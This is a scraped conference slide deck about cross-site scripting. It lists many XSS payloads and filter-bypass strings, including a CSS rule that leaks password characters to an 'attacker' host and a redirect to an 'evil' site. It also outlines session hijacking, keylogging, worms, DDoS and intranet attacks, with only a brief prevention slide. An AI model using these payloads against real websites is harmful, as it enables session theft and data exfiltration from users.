Xss is more than a simple threat


Published on

XSS is more than you can imagine. You should take a look.

Published in: Education

Xss is more than a simple threat

  1. 1. XSS is more than a simple threat <ul><li>Avădănei Andrei </li></ul><ul><li>Software Developer, Blogger, Student </li></ul><ul><li>www.worldit.info </li></ul><ul><li>@AndreiAvadanei </li></ul><ul><li>[email_address] </li></ul><ul><li>#RoCyberCon @20 february </li></ul>
  2. 2. Introduction to XSS <ul><li>Short story </li></ul><ul><li>XSS types </li></ul><ul><li>Shouts </li></ul>
  3. 3. Short story <ul><li>XSS </li></ul><ul><li>- it's a client side vulnerability </li></ul><ul><li>- … but can become a server side one </li></ul><ul><li>- based on Javascript injection </li></ul><ul><li>- … and HTML, Java, ActiveX, VBScript, Flash, JSON and so on </li></ul><ul><li>- is the second most popular threat in 2010 (via Infosec & OWASP) </li></ul><ul><li>- with many resources available on the Internet (use Google) </li></ul>
  4. 4. XSS Types <ul><li>Non-persistent (reflected) </li></ul><ul><li>- the most common type of XSS injection </li></ul><ul><li>- requires server side interpretation of the query </li></ul><ul><li>- third-party required </li></ul><ul><li>Persistent (stored) </li></ul><ul><li>- the most dangerous type of XSS injection </li></ul><ul><li>- requires server side interpretation of the query and data storing </li></ul><ul><li>- third-party may not be required </li></ul><ul><li>Dom-based </li></ul><ul><li>- the newest type of XSS injection </li></ul><ul><li>- requires client side interpretation </li></ul><ul><li>- usually non-persistent </li></ul>
  5. 5. Shouts #1 – XSS Amazon
  6. 6. Shouts #2 XSS Facebook
  7. 7. Shouts #3 XSS Google
  8. 8. Shouts #4 XSS Ebay
  9. 9. Shouts #5 More XSS 'ed <ul><li>Twitter, MySpace, Hi5, Wordpress, Yahoo, Joomla, PhpBB, Drupal, e107, WorldIT.info , PHP-Nuke, PHP-Fusion, *.edu, *.gov, NASA, Youtube, Blogspot, Symantec, Kaspersky, NOD32, browser plugins etc. etc. etc. etc. </li></ul>
  10. 10. Getting XSS 'ed <ul><li>Where? </li></ul><ul><li>Basic XSS'ing </li></ul><ul><li>Advanced XSS'ing </li></ul><ul><li>HTML 5 XSS'ed </li></ul><ul><li>Bypass XSS protection </li></ul>
  11. 11. Where? everywhere <ul><li>Rule : ” Do not trust in anything ever, especially when it comes to user input. ” </li></ul><ul><li>XSS vulnerabilities can be found in anything that came from user. </li></ul><ul><li>GET, POST, COOKIE, FILES, SERVER and Headers are main targets. </li></ul><ul><li>Try to be clever. </li></ul>
  12. 12. Basic XSS 'ing <ul><li><script>alert(1)</script> //basic </li></ul><ul><li>“ ><script>alert(1)</script> //bypass a open tag </li></ul><ul><li><!--<img src=&quot;--><img src=x onerror=alert(1)//&quot;> //bypass & generate a error </li></ul><ul><li>“ onmouseover=”alert(1)” //all javascript events </li></ul><ul><li>alert(/XSS/.source) or alert( String(/Test/).substr(1,4) ); //some other simple vectors </li></ul><ul><li><script>alert(String.fromCharCode(88,83,83));</script> //bypass quotes filters </li></ul><ul><li><IMG SRC=javascript:alert('XSS')> //unicode injection; utf-8, hex, decimal or octal injection may work </li></ul><ul><li><meta http-equiv=&quot;refresh&quot; content=&quot;0;url=http://;javascript:...&quot; // evasion </li></ul><ul><li><style type=text/javascript>alert('xss')</style> //javascript injection based on style tag </li></ul><ul><li>“ ><img src=”x:x” onerror=”alert(0)”> // :D </li></ul><ul><li>[…] </li></ul>
  13. 13. Advanced XSS 'ing <ul><li><META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url= data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K &quot;> </li></ul><ul><li><META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL= javascript:alert('XSS ');&quot;> </li></ul><ul><li><DIV STYLE=&quot;background-image:00750072006C0028'006a006100760061007300630072006900700074003a0061006c0065007200740028.10270058.1053005300270029'0029&quot;> //background & unicode </li></ul><ul><li>exp/*<A STYLE='noxss:noxss(&quot;*//*&quot;);xss:ex/*XSS*//*/*/pression(alert(&quot;XSS&quot;))'> //send IE into a loop </li></ul><ul><li><XML ID=&quot;xss&quot;><I><B>&lt;IMG SRC=&quot;javas<!-- -->cript:alert('XSS')&quot;&gt;</B></I></XML><SPAN DATASRC=&quot;#xss&quot; DATAFLD=&quot;B&quot; DATAFORMATAS=&quot;HTML&quot;></SPAN> //xss in xml document </li></ul><ul><li>x='x61x6cx65x72x74x28x31x29'; new Function(x)(); //something different from every day injections </li></ul><ul><li>Function('ax6cert(1)')(); // ;) </li></ul><ul><li>x=eval,1,1,1;1; 1,1,1,b='',1,1,1; 1,1,1,s=''',1,1,1;1,1,1,o='0',1,1,1; x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) ); //eval + unicode injection </li></ul><ul><li>[...] </li></ul>
  14. 14. HTML 5 XSS 'ed <ul><li>- new technologies, new problems </li></ul><ul><li><video onerror=” javascript:alert(1 )”><source> //new tag </li></ul><ul><li><audio onerror=”javascript:alert(1)”><source> //other new tag </li></ul><ul><li><form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X //new events </li></ul><ul><li><div draggable=”true” ondragstart=”event.dataTransfer.setData('text/plain', ' Evil payload ')”> <h3>DRAG ME!!</h3> </div> //new functions, events & attributes </li></ul><ul><li><input type=&quot;text&quot; AUTOFOCUS onfocus=alert(1)> </li></ul><ul><li><script>alert(localStorage.getItem('foo'))</script> //access local storage </li></ul><ul><li>“ ><script>(history.pushState({},”,'index.php'))(document.forms[0].action=' http://maliciousURL ')</script> //conceal the real location and replace it with anything we want. Ex : http://bit.ly/pushStateXSS </li></ul>
  15. 15. Bypass XSS protection <ul><li><img/src=&quot;mars.png&quot;alt=&quot;mars&quot;> //no white spaces, use / instead </li></ul><ul><li><object data=&quot; javascript:alert(0 )&quot;> //avoid src </li></ul><ul><li><isindex type=image src=1 onerror=alert(1)> //did you know isindex tag? </li></ul><ul><li><img src=x:alert(alt) onerror=eval(src) alt=0> //another bypass for error generation </li></ul><ul><li>location=location.hash.slice(1); //avoid the # </li></ul><ul><li>http://victim.com?param=&quot;;location=location.hash)//#0={};alert(0) //payload after the hash url, victim won't see true payload </li></ul><ul><li>alert(document.cookie) or alert(document['cookie']) or with(document)alert(cookie) //same results </li></ul><ul><li>&quot;&quot;+{toString:alert} or &quot;&quot;+{valueOf:alert} //Executes function without using () or = </li></ul><ul><li>Future tricks in HTML 5 </li></ul><ul><li></a onmousemove=&quot;alert(1)&quot;> //html 5 will support events in closed tags </li></ul><ul><li><style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style> //pure xss-based XSS </li></ul><ul><li>data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg == //avoid using plain text/html value </li></ul><ul><li>?injection=<script+&injection=>alert(1)></script> //HPP, popular in SQLi </li></ul><ul><ul><ul><ul><ul><li>via BlackHat Conferences. </li></ul></ul></ul></ul></ul>
  16. 16. XSS Injection Exploitation (part 1) <ul><li>Redirection </li></ul><ul><li>Clickjacking </li></ul><ul><li>URL Spoofing </li></ul><ul><li>Session hijacking </li></ul><ul><li>Cookie stuffing </li></ul><ul><li>Ad Hijacking </li></ul><ul><li>CSRF/XSRF attacks </li></ul><ul><li>History stealling </li></ul><ul><li>XSS Defacement </li></ul><ul><li>Key & Mouse logging </li></ul>
  17. 17. Redirection & Clickjacking <ul><li>Redirection </li></ul><ul><li>redirect your victim, ex. document.location = ”http://www.your-evil-site.com”; </li></ul><ul><li>you create fake traffic </li></ul><ul><li>popular </li></ul><ul><li>Clickjacking </li></ul><ul><li>describes one websites that poses as another. </li></ul><ul><li>ex. : redirect victim to you onclick event calling </li></ul><ul><li>used in phishing, gives high credibility </li></ul><ul><li>extremely popular </li></ul>
  18. 18. URL Spoofing <ul><li>popular in phishing </li></ul><ul><li>the url is user friendly </li></ul><ul><li>the web page content is hijacked and all information are send to monitored websites by a thief </li></ul><ul><li>extremely popular </li></ul>
  19. 19. Session Hijacking <ul><li>also known as ”Cookie Stealling” </li></ul><ul><li>usually used with document.cookie </li></ul><ul><li>help you to gain control over other logged session </li></ul><ul><li>needs a cookie grabber </li></ul><ul><li>for instance, XSS in *.yahoo.com can help you to hijack Yahoo accounts </li></ul><ul><li>extremely popular </li></ul>
  20. 20. Cookie stuffing <ul><li>also known as cookie dropping </li></ul><ul><li>used in blackhat online marketing </li></ul><ul><li>generates illegitimate affiliate sellings by hijacking cookies </li></ul><ul><li>uses pop-ups, frames and iframes, images, javascript, stylesheets or flash for accomplishing cookie dropping </li></ul><ul><li>popular </li></ul>
  21. 21. Ad Hijacking <ul><li>used in blackhat online marketing </li></ul><ul><li>usually requires persistent XSS </li></ul><ul><li>you can modify ad scripts with your own, getting paid when user clicks on hijacked ads </li></ul><ul><li>popular </li></ul>
  22. 22. CSRF/XSRF attacks <ul><li>unauthorized commands are transmited from an user that website trusts. </li></ul><ul><li>usually used along with <img src=””. </li></ul><ul><li>for instance, if <img src=” http://victim.com/?do=logout ” /> is permanently injected and an user acces the page with malformated content, he will be forced to log out. </li></ul><ul><li>use your imagination, you can do more than that. </li></ul>
  23. 23. History Stealling <ul><li>You can find out what sites have been visited by the victim using ” getComputedStyle ” like bellow, after you createad a node with CSS visited selector having a custom known color : </li></ul><ul><li>document.defaultView.getComputedStyle( link , null).getPropertyValue(&quot;color&quot;); </li></ul><ul><li>rarely used, but still important </li></ul><ul><li>it could be done using the full power of HTML 5 </li></ul>
  24. 24. XSS Defacement <ul><li>looks like server side defaced pages </li></ul><ul><li>… but it's only a client side deface </li></ul><ul><li>can create chaos and confusion when they are used for hacking an website </li></ul><ul><li>invoves changing the HTML content of the page </li></ul><ul><li>of course, two types : persistent and non-persistent </li></ul><ul><li>persistent XSS deface are more dangerous than no-persistent </li></ul>
  25. 25. Key & Mouse Logging <ul><li>Keylogging </li></ul><ul><li>- log all keystrokes and send remotely </li></ul><ul><li>- document.onkeypress / unsafeWindow.onkeypress events </li></ul><ul><li>- store keystrokes on a local variable and send them regular on a remote server </li></ul><ul><li>Mouse logging </li></ul><ul><li>- log all mouse moves and send remotely </li></ul><ul><li>- document.onmousemove event </li></ul><ul><li>- dangerous but not so popular </li></ul><ul><li>0 </li></ul>
  26. 26. Tired? <ul><li>You shouldn't, because this is only the beggining... </li></ul>
  27. 27. XSS Injection Exploitation (part 2) <ul><li>Browser hijacking </li></ul><ul><li>Port Scanning </li></ul><ul><li>DDoS </li></ul><ul><li>XSS Tunneling </li></ul><ul><li>Distributed Password Cracking </li></ul><ul><li>Worms (Spreading) </li></ul><ul><li>Arbitrary file execution & Privilege escalation </li></ul><ul><li>Intranet Hacking </li></ul>
  28. 28. Browser Hijacking <ul><li>Also known as Tab Hijacking . </li></ul><ul><li>Highly recommended when hacker want a second shot on victims. </li></ul><ul><li>XSS Shells usually do for you </li></ul><ul><li>With iframe injection </li></ul><ul><li>Working until the victim close the tab. </li></ul><ul><li>The only drawback with this method is that the URL bar does not change with each click, which may or may not be noticeable to the user. </li></ul>
  29. 29. Distributed port scanning <ul><li>Cross domain XMLHttpRequests and WebSockets for performing remote port scanning, but using XSS you can do distributed remote port scanning </li></ul><ul><li>Latest Firefox, Chrome or Safari supports already these new technolologies </li></ul><ul><li>This option it's not available yet but it will in the next generation of XSS Shell </li></ul><ul><li>Firefox & Safari time connection is less than 100 ms </li></ul><ul><li>1 victim – 65,000 scanned ports – 6,500 seconds </li></ul><ul><li>100 victims - 65,000 scanned ports – 6,5 seconds </li></ul><ul><li>What about 1,000 or 10,000 victims? </li></ul>
  30. 30. DDoS <ul><li>Based on WebSockets </li></ul><ul><li>Application-level DDoS attacks (layer 7 DDoS) </li></ul><ul><li>Cross Origin Request (COR) are processed even if the site has restriction and therefore the request will create a load on the server </li></ul><ul><li>1 minute – 1 browser – 10,000 requests / minute using COR WebWorkers with GET requests </li></ul><ul><li>1 minute – 600 browser – over 100, 000 requests / minute can be enought to shut down a target </li></ul><ul><li>We should wait for upgrading the majority of the browsers in the world </li></ul><ul><li>But blackhat teams will be prepared with amazing tools for DDoS </li></ul>
  31. 31. XSS Tunneling <ul><li>XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack. </li></ul><ul><li>At technical level, it may be an Ajax application. Node.js and Comet Push can make difference in the future XSS Shells. </li></ul><ul><li>XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies. </li></ul><ul><li>XSS Tunnel is the standard HTTP proxy which sits on an attacker’s system. </li></ul><ul><li>You can tunnel all your traffic throught a XSS Channel. </li></ul><ul><li>You can build your own SSH-like protocol. </li></ul><ul><li>You can forget about the user session problem when hijacking is not possible because there is an IP adress restriction. </li></ul><ul><li>Again, your imagination is the limit. </li></ul>
  32. 32. Distributed Password Cracking <ul><li>Javascript engines are becoming verry fast. </li></ul><ul><li>And we have WebWorkers. </li></ul><ul><li>Password guessing rates in Javascript tools of 100,000 MD5 hashes/second . </li></ul><ul><li>~100 machines running the JavaScript distributed password cracking program can match the cracking rate of one machine running a similar program written in native code. </li></ul><ul><li>But, in these days spreading methods are verry effective. Why not 10,000 compromised machines? </li></ul><ul><li>Ravan - a JavaScript distributed password cracker that uses HTML5 WebWorkers. </li></ul><ul><li>Perform password cracking in background JavaScript threads. </li></ul><ul><li>Support salted MD5 and SHA hashes. </li></ul>
  33. 33. Worms (spreading) <ul><li>One of the most efficient environment for worm propagation - social networking </li></ul><ul><li>XSS Warhol Worm </li></ul><ul><li>Linear XSS Worm </li></ul><ul><li>Hydra XSS Worm </li></ul><ul><li>Samy (2005) inffected over 1,000,000 users from MySace in 20 hours </li></ul><ul><li>Yahoo!, Hi5, Twitter and Facebook could easily be next targets on a larger scale. </li></ul><ul><li>You can simply attach a trojan with your Worm and the risks of creating permanent zombies are growing. </li></ul>
  34. 34. Arbitrary file execution <ul><li>In 2008 a vulnerability which affected the IE 7 & IE 8 could execute some arbitrary files using some social engineering skills. </li></ul><ul><li>During last years few other similar vulnerabilities appeard on Internet jungle. </li></ul><ul><li>Still, a XSS vulnerability and a CSRF vulnerability in a administrator file editor, which can be bypassed with XMLHttpRequest to the same origin requests an you have the right combination : a XSS vulnerability has become arbitrary code execution ( privilege escalation ). </li></ul><ul><li>What are you waiting for? Find the next one major privilege escalation vulnerability. </li></ul>
  35. 35. Intranet Hacking (part 1) <ul><li>Web browsers can be completely controlled by any Web page, enabling them to become launching points to attack internal network resources. Why? </li></ul>
  36. 36. Intranet Hacking (part 2) <ul><li>Exploit procedures : </li></ul><ul><li>A victim visits a malicious Web page or clicks a nefarious link; embedded JavaScript malware then assumes control over their Web browser. </li></ul><ul><li>JavaScript malware loads a Java applet revealing the victim’s internal NAT IP address. </li></ul><ul><li>Then, using the victim’s Web browser as an attack platform, the JavaScript malware identifies and fingerprints Web servers on the internal network. </li></ul><ul><li>Attacks are initiated against internal or external Web sites, and compromised information is sent outside the network for collection. </li></ul>
  37. 37. Intranet Hacking (part 3) <ul><li>Collecting information : </li></ul><ul><li>Obtaining NAT'ed IP Adress – MyAddress, a special Java Applet </li></ul><ul><li>Port scanning - <script src= http://ip/ ></script> </li></ul><ul><li>Blind Web Server Fingerprinting - explore the use of unique image URLs, CSS or JavaScript files to perform fingerprinting. </li></ul><ul><ul><li><img src=&quot;http://intranet_ip/unique_image_url&quot; onerror=&quot;fingerprint()&quot; /> </li></ul></ul><ul><li>Attack the intranet </li></ul><ul><ul><li>- try different well-known vulnerabilities </li></ul></ul><ul><ul><li>- try hacking the web interface of DSL routers </li></ul></ul><ul><ul><li>- load local files using file:/// </li></ul></ul><ul><ul><li>- get help from XSS Shells </li></ul></ul>
  38. 38. Preventing XSS attacks <ul><li>Filtering </li></ul><ul><li>Input / Output encoding </li></ul><ul><li>Web browser security </li></ul><ul><ul><li>- select a safer browser (Chrome) </li></ul></ul><ul><ul><li>- use a virtual machine for suspicious links </li></ul></ul><ul><ul><li>- pay more attention to shortened urls </li></ul></ul><ul><ul><li>- use plugins for better security (like NoScript) </li></ul></ul>
  39. 39. XSS it's still a simple threat? <ul><li>:) </li></ul>
  40. 40. Question? <ul><li>Thanks. :) </li></ul>
  41. 41. Bibliography <ul><li>Experience & Google. </li></ul>